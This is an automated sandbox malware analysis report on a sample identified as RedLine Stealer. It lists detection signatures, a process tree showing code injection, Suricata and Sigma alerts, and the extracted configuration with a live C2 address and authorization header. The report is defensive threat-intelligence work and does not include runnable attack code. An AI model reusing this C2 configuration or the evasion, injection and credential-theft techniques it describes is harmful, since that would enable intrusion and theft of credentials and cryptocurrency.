Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
uFVgJVXaEU.exe

Overview

General Information

Sample name:uFVgJVXaEU.exe
renamed because original name is a hash value
Original sample name:bfae2c479a12cbc660e580a84d3e3ce0.exe
Analysis ID:1576604
MD5:bfae2c479a12cbc660e580a84d3e3ce0
SHA1:0891b36b510049ef811deb93fcdacfdfdbfc406a
SHA256:2ea05b5b9847fb2e777f4433a2f73cba12b96a8b074ab83179cbafbc49963665
Tags:exeuser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected RedLine Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to inject code into remote processes
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Found API chain indicative of debugger detection
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • uFVgJVXaEU.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\uFVgJVXaEU.exe" MD5: BFAE2C479A12CBC660E580A84D3E3CE0)
    • audiodg.exe (PID: 7660 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
    • svchost.exe (PID: 7668 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
      • explorer.exe (PID: 4084 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • F72F.tmp.ssg.exe (PID: 7860 cmdline: "C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe" MD5: 7B6730CA4DA283A35C41B831B9567F15)
        • 2F409E82DCA61388941053.exe (PID: 7928 cmdline: "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe" MD5: BFAE2C479A12CBC660E580A84D3E3CE0)
          • svchost.exe (PID: 7956 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 7968 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 7976 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
        • 21AB.tmp.zx.exe (PID: 8144 cmdline: "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe" MD5: BB0BE25BDD2121FA0BDDF6AC59D4FA8D)
          • 21AB.tmp.zx.exe (PID: 1528 cmdline: "C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe" MD5: BB0BE25BDD2121FA0BDDF6AC59D4FA8D)
        • 2F409E82DCA61388941053.exe (PID: 7212 cmdline: "C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe" MD5: BFAE2C479A12CBC660E580A84D3E3CE0)
          • svchost.exe (PID: 7280 cmdline: "C:\Windows\system32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
          • audiodg.exe (PID: 7308 cmdline: "C:\Windows\system32\audiodg.exe" MD5: 627DEA21175691FDE4495877C53B4C87)
          • msiexec.exe (PID: 7324 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
    • msiexec.exe (PID: 7676 cmdline: "C:\Windows\system32\msiexec.exe" MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000005.00000002.2693672172.000000000FF40000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
        • 0x3decd:$s2: ReflectiveLoader@
        00000006.00000000.1490441463.00000000004C2000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000005.00000000.1435821747.000000000DFA0000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
          • 0x3decd:$s2: ReflectiveLoader@
          00000005.00000003.1489240627.000000000A37D000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000005.00000002.2692336010.000000000DFA0000.00000040.00000001.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
            • 0x3decd:$s2: ReflectiveLoader@
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            5.0.explorer.exe.e100000.5.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
            • 0x3decd:$s2: ReflectiveLoader@
            5.2.explorer.exe.8220535.0.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
            • 0x3d0cd:$s2: ReflectiveLoader@
            5.2.explorer.exe.e080535.5.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
            • 0x3c2cd:$s2: ReflectiveLoader@
            6.0.F72F.tmp.ssg.exe.4c0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              5.0.explorer.exe.c1b2c20.1.raw.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
              • 0x3d0cd:$s2: ReflectiveLoader@
              Click to see the 34 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\uFVgJVXaEU.exe, ProcessId: 7600, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Services
              Sigma detected: Remote Thread Creation By Uncommon Source Image
              Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\msiexec.exe, SourceProcessId: 7676, StartAddress: E080000, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 4084
              Sigma detected: Uncommon Svchost Parent Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uFVgJVXaEU.exe", ParentImage: C:\Users\user\Desktop\uFVgJVXaEU.exe, ParentProcessId: 7600, ParentProcessName: uFVgJVXaEU.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7668, ProcessName: svchost.exe
              Sigma detected: Windows Processes Suspicious Parent Directory
              Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\system32\svchost.exe", CommandLine: "C:\Windows\system32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\uFVgJVXaEU.exe", ParentImage: C:\Users\user\Desktop\uFVgJVXaEU.exe, ParentProcessId: 7600, ParentProcessName: uFVgJVXaEU.exe, ProcessCommandLine: "C:\Windows\system32\svchost.exe", ProcessId: 7668, ProcessName: svchost.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T10:15:06.336483+010020432341A Network Trojan was detected185.81.68.1471912192.168.2.849710TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T10:15:05.892902+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:11.498795+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:12.125807+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:12.671198+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:14.250236+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:14.814311+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:15.314297+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:16.035094+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:16.503808+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:16.984893+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:17.437884+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:18.066653+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:18.084242+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:18.532245+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:18.973784+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:19.415304+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:19.851257+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:20.336637+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:20.799615+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:21.240256+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:22.794899+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:23.245593+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:23.685906+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              2024-12-17T10:15:24.159621+010020432311A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T10:15:12.247937+010020460561A Network Trojan was detected185.81.68.1471912192.168.2.849710TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T10:15:02.108574+010020197142Potentially Bad Traffic192.168.2.849708185.81.68.14780TCP
              2024-12-17T10:15:04.677281+010020197142Potentially Bad Traffic192.168.2.849709185.81.68.14780TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-17T10:15:05.892902+010020460451A Network Trojan was detected192.168.2.849710185.81.68.1471912TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: 6.0.F72F.tmp.ssg.exe.4c0000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.81.68.147:1912"], "Bot Id": "eewx", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeReversingLabs: Detection: 33%
              Source: C:\Users\user\AppData\Local\Temp\2D25.tmp.update.exeReversingLabs: Detection: 57%
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeReversingLabs: Detection: 91%
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeReversingLabs: Detection: 57%
              Multi AV Scanner detection for submitted file
              Source: uFVgJVXaEU.exeReversingLabs: Detection: 57%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\2D25.tmp.update.exeJoe Sandbox ML: detected
              Machine Learning detection for sample
              Source: uFVgJVXaEU.exeJoe Sandbox ML: detected
              Source: uFVgJVXaEU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609827265.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610543566.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdbMM source: 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_socket.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604444208.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605079743.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1632238467.00007FFBBB935000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605738557.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604778086.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_hashlib.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604054573.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607581691.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609401461.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611370859.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_ctypes.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1632487423.00007FFBC3201000.00000002.00000001.01000000.0000000E.sdmp
              Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605348657.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607843222.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607058503.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_bz2.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1603641195.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608628812.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604870009.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.amd64.pdbGCTL source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1632632314.00007FFBC321E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606094024.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604568784.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604985991.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608404585.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.12.dr
              Source: Binary string: C:\A\21\b\bin\amd64\select.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1615972666.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606490661.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: 21AB.tmp.zx.exe, 0000000D.00000002.1632238467.00007FFBBB935000.00000002.00000001.01000000.0000000B.sdmp
              Source: Binary string: vcruntime140.amd64.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1603466307.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, 21AB.tmp.zx.exe, 0000000D.00000002.1632632314.00007FFBC321E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611718162.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605261861.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607206409.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605956547.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604669158.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608235922.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1631752112.00007FFBAAE7D000.00000002.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610124454.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605640873.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606311059.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605846257.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611918910.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606809485.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607729908.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606922801.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605173726.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610339466.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605543300.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605445250.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609596519.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611567066.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,12_2_00007FF7F24F79B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F24F85A0 FindFirstFileExW,FindClose,12_2_00007FF7F24F85A0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 12_2_00007FF7F2510B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,12_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F85A0 FindFirstFileExW,FindClose,13_2_00007FF7F24F85A0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F2510B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,13_2_00007FF7F2510B84
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FF7F24F79B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00007FF7F24F79B0
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F303C FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBBB8F303C
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCode function: 13_2_00007FFBBB8F3280 FindFirstFileExW,FindNextFileW,FindClose,13_2_00007FFBBB8F3280

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.8:49710 -> 185.81.68.147:1912
              Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.8:49710 -> 185.81.68.147:1912
              Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.8:49710
              Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.8:49710
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.81.68.147:1912
              Source: global trafficTCP traffic: 192.168.2.8:49710 -> 185.81.68.147:1912
